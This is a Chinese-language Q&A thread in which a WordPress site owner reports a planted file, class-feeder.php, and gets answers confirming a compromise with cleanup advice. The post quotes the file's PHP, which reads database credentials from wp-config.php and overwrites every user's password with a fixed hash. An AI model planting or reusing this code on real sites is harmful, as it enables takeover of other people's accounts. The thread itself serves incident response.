我非常关注正在添加和访问的文件,它在我的cpanel中说明
我发现在include文件夹中添加了这个class-feeder.php并且里面有一些代码
<?php
include_once '../wp-config.php';
$con=mysql_connect('localhost',DB_USER,DB_PASSWORD) or die(mysql_error());
mysql_select_db(DB_NAME,$con) or die(mysql_error());
$sql="Update wp_users set user_pass='$"."P"."$"."Bs4sdfEreymQasdfwMzJaasdfasdf4dj20'";
mysql_query($sql,$con) or die(mysql_error());
?>
我被黑了,因为上传文件夹中的所有图片都是空的,请帮助
答案 0 :(得分:2)
是的,你被黑了。仔细遵循WordPress.org Codex中的FAQ - My Site Was Hacked,其中包括更改所有密码,检查数据库中的eval代码,替换所有核心WordPress文件和文件夹,评估您的webhost安全性,强化WordPress等等
答案 1 :(得分:0)
看起来这个文件正在更新每个密码以使用此哈希
Bs4sdfEreymQasdfwMzJaasdfasdf4dj20这意味着,您的帐户(在您的WordPress上)会受到损害。
答案 2 :(得分:0)
是的,你被黑了,只需删除这个奇怪的文件,并尽快更改你的Wp后端,FTP和cpanel凭证。
通常黑客也会留下一些后门再次获取网站的访问权限,以便在你的worpress文件中查找或搜索eval,并确定是否存在任何其他奇怪的文件。